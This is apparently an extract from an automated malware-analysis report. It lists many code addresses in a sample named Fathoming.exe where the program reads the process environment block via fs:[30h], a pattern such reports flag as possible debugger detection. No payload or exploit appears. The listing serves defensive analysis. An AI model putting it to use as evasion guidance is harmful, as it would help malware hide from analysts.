      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEC7C0 mov eax, dword ptr fs:[00000030h]8_2_21AEC7C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B607C3 mov eax, dword ptr fs:[00000030h]8_2_21B607C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5C730 mov eax, dword ptr fs:[00000030h]8_2_21B5C730
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1273C mov eax, dword ptr fs:[00000030h]8_2_21B1273C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1273C mov ecx, dword ptr fs:[00000030h]8_2_21B1273C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1273C mov eax, dword ptr fs:[00000030h]8_2_21B1273C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C720 mov eax, dword ptr fs:[00000030h]8_2_21B1C720
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C720 mov eax, dword ptr fs:[00000030h]8_2_21B1C720
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B10710 mov eax, dword ptr fs:[00000030h]8_2_21B10710
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C700 mov eax, dword ptr fs:[00000030h]8_2_21B1C700
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0710 mov eax, dword ptr fs:[00000030h]8_2_21AE0710
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8770 mov eax, dword ptr fs:[00000030h]8_2_21AE8770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22750 mov eax, dword ptr fs:[00000030h]8_2_21B22750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22750 mov eax, dword ptr fs:[00000030h]8_2_21B22750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B64755 mov eax, dword ptr fs:[00000030h]8_2_21B64755
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E75D mov eax, dword ptr fs:[00000030h]8_2_21B6E75D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1674D mov esi, dword ptr fs:[00000030h]8_2_21B1674D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1674D mov eax, dword ptr fs:[00000030h]8_2_21B1674D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1674D mov eax, dword ptr fs:[00000030h]8_2_21B1674D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0750 mov eax, dword ptr fs:[00000030h]8_2_21AE0750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B166B0 mov eax, dword ptr fs:[00000030h]8_2_21B166B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C6A6 mov eax, dword ptr fs:[00000030h]8_2_21B1C6A6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4690 mov eax, dword ptr fs:[00000030h]8_2_21AE4690
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4690 mov eax, dword ptr fs:[00000030h]8_2_21AE4690
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B606F1 mov eax, dword ptr fs:[00000030h]8_2_21B606F1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B606F1 mov eax, dword ptr fs:[00000030h]8_2_21B606F1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A6C7 mov ebx, dword ptr fs:[00000030h]8_2_21B1A6C7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A6C7 mov eax, dword ptr fs:[00000030h]8_2_21B1A6C7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE262C mov eax, dword ptr fs:[00000030h]8_2_21AE262C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE627 mov eax, dword ptr fs:[00000030h]8_2_21AFE627
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B16620 mov eax, dword ptr fs:[00000030h]8_2_21B16620
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18620 mov eax, dword ptr fs:[00000030h]8_2_21B18620
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22619 mov eax, dword ptr fs:[00000030h]8_2_21B22619
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E609 mov eax, dword ptr fs:[00000030h]8_2_21B5E609
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B12674 mov eax, dword ptr fs:[00000030h]8_2_21B12674
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A660 mov eax, dword ptr fs:[00000030h]8_2_21B1A660
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A660 mov eax, dword ptr fs:[00000030h]8_2_21B1A660
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA866E mov eax, dword ptr fs:[00000030h]8_2_21BA866E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA866E mov eax, dword ptr fs:[00000030h]8_2_21BA866E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFC640 mov eax, dword ptr fs:[00000030h]8_2_21AFC640
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE09AD mov eax, dword ptr fs:[00000030h]8_2_21AE09AD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE09AD mov eax, dword ptr fs:[00000030h]8_2_21AE09AD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B689B3 mov esi, dword ptr fs:[00000030h]8_2_21B689B3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B689B3 mov eax, dword ptr fs:[00000030h]8_2_21B689B3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B689B3 mov eax, dword ptr fs:[00000030h]8_2_21B689B3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B129F9 mov eax, dword ptr fs:[00000030h]8_2_21B129F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B129F9 mov eax, dword ptr fs:[00000030h]8_2_21B129F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E9E0 mov eax, dword ptr fs:[00000030h]8_2_21B6E9E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B149D0 mov eax, dword ptr fs:[00000030h]8_2_21B149D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAA9D3 mov eax, dword ptr fs:[00000030h]8_2_21BAA9D3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B769C0 mov eax, dword ptr fs:[00000030h]8_2_21B769C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6892A mov eax, dword ptr fs:[00000030h]8_2_21B6892A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B7892B mov eax, dword ptr fs:[00000030h] | 8_2_21B7892B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6C912 mov eax, dword ptr fs:[00000030h] | 8_2_21B6C912
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AD8918 mov eax, dword ptr fs:[00000030h] | 8_2_21AD8918
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AD8918 mov eax, dword ptr fs:[00000030h] | 8_2_21AD8918
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5E908 mov eax, dword ptr fs:[00000030h] | 8_2_21B5E908
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5E908 mov eax, dword ptr fs:[00000030h] | 8_2_21B5E908
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B84978 mov eax, dword ptr fs:[00000030h] | 8_2_21B84978
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B84978 mov eax, dword ptr fs:[00000030h] | 8_2_21B84978
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6C97C mov eax, dword ptr fs:[00000030h] | 8_2_21B6C97C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B06962 mov eax, dword ptr fs:[00000030h] | 8_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B06962 mov eax, dword ptr fs:[00000030h] | 8_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B06962 mov eax, dword ptr fs:[00000030h] | 8_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B2096E mov eax, dword ptr fs:[00000030h] | 8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B2096E mov edx, dword ptr fs:[00000030h] | 8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B2096E mov eax, dword ptr fs:[00000030h] | 8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B60946 mov eax, dword ptr fs:[00000030h] | 8_2_21B60946
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB4940 mov eax, dword ptr fs:[00000030h] | 8_2_21BB4940
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE0887 mov eax, dword ptr fs:[00000030h] | 8_2_21AE0887
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6C89D mov eax, dword ptr fs:[00000030h] | 8_2_21B6C89D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1C8F9 mov eax, dword ptr fs:[00000030h] | 8_2_21B1C8F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1C8F9 mov eax, dword ptr fs:[00000030h] | 8_2_21B1C8F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BAA8E4 mov eax, dword ptr fs:[00000030h] | 8_2_21BAA8E4
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B0E8C0 mov eax, dword ptr fs:[00000030h] | 8_2_21B0E8C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB08C0 mov eax, dword ptr fs:[00000030h] | 8_2_21BB08C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1A830 mov eax, dword ptr fs:[00000030h] | 8_2_21B1A830
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B8483A mov eax, dword ptr fs:[00000030h] | 8_2_21B8483A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B8483A mov eax, dword ptr fs:[00000030h] | 8_2_21B8483A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h] | 8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h] | 8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h] | 8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B02835 mov ecx, dword ptr fs:[00000030h] | 8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h] | 8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h] | 8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6C810 mov eax, dword ptr fs:[00000030h] | 8_2_21B6C810
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6E872 mov eax, dword ptr fs:[00000030h] | 8_2_21B6E872
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6E872 mov eax, dword ptr fs:[00000030h] | 8_2_21B6E872
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B76870 mov eax, dword ptr fs:[00000030h] | 8_2_21B76870
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B76870 mov eax, dword ptr fs:[00000030h] | 8_2_21B76870
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B10854 mov eax, dword ptr fs:[00000030h] | 8_2_21B10854
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AF2840 mov ecx, dword ptr fs:[00000030h] | 8_2_21AF2840
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE4859 mov eax, dword ptr fs:[00000030h] | 8_2_21AE4859
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE4859 mov eax, dword ptr fs:[00000030h] | 8_2_21AE4859
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B94BB0 mov eax, dword ptr fs:[00000030h] | 8_2_21B94BB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B94BB0 mov eax, dword ptr fs:[00000030h] | 8_2_21B94BB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AF0BBE mov eax, dword ptr fs:[00000030h] | 8_2_21AF0BBE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AF0BBE mov eax, dword ptr fs:[00000030h] | 8_2_21AF0BBE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6CBF0 mov eax, dword ptr fs:[00000030h] | 8_2_21B6CBF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B0EBFC mov eax, dword ptr fs:[00000030h] | 8_2_21B0EBFC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE8BF0 mov eax, dword ptr fs:[00000030h] | 8_2_21AE8BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE8BF0 mov eax, dword ptr fs:[00000030h] | 8_2_21AE8BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE8BF0 mov eax, dword ptr fs:[00000030h] | 8_2_21AE8BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE0BCD mov eax, dword ptr fs:[00000030h] | 8_2_21AE0BCD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE0BCD mov eax, dword ptr fs:[00000030h] | 8_2_21AE0BCD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE0BCD mov eax, dword ptr fs:[00000030h] | 8_2_21AE0BCD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B8EBD0 mov eax, dword ptr fs:[00000030h] | 8_2_21B8EBD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B00BCB mov eax, dword ptr fs:[00000030h] | 8_2_21B00BCB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B00BCB mov eax, dword ptr fs:[00000030h] | 8_2_21B00BCB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B00BCB mov eax, dword ptr fs:[00000030h] | 8_2_21B00BCB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B0EB20 mov eax, dword ptr fs:[00000030h] | 8_2_21B0EB20
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B0EB20 mov eax, dword ptr fs:[00000030h] | 8_2_21B0EB20
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BA8B28 mov eax, dword ptr fs:[00000030h] | 8_2_21BA8B28
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BA8B28 mov eax, dword ptr fs:[00000030h] | 8_2_21BA8B28
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h] | 8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB4B00 mov eax, dword ptr fs:[00000030h] | 8_2_21BB4B00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21ADCB7E mov eax, dword ptr fs:[00000030h] | 8_2_21ADCB7E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B8EB50 mov eax, dword ptr fs:[00000030h] | 8_2_21B8EB50
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h] | 8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h] | 8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h] | 8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h] | 8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B94B4B mov eax, dword ptr fs:[00000030h] | 8_2_21B94B4B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B94B4B mov eax, dword ptr fs:[00000030h] | 8_2_21B94B4B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B76B40 mov eax, dword ptr fs:[00000030h] | 8_2_21B76B40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B76B40 mov eax, dword ptr fs:[00000030h] | 8_2_21B76B40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BAAB40 mov eax, dword ptr fs:[00000030h] | 8_2_21BAAB40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B88B42 mov eax, dword ptr fs:[00000030h] | 8_2_21B88B42
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AD8B50 mov eax, dword ptr fs:[00000030h] | 8_2_21AD8B50
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE8AA0 mov eax, dword ptr fs:[00000030h] | 8_2_21AE8AA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE8AA0 mov eax, dword ptr fs:[00000030h] | 8_2_21AE8AA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B36AA4 mov eax, dword ptr fs:[00000030h] | 8_2_21B36AA4
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B18A90 mov edx, dword ptr fs:[00000030h] | 8_2_21B18A90
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h] | 8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21BB4A80 mov eax, dword ptr fs:[00000030h] | 8_2_21BB4A80
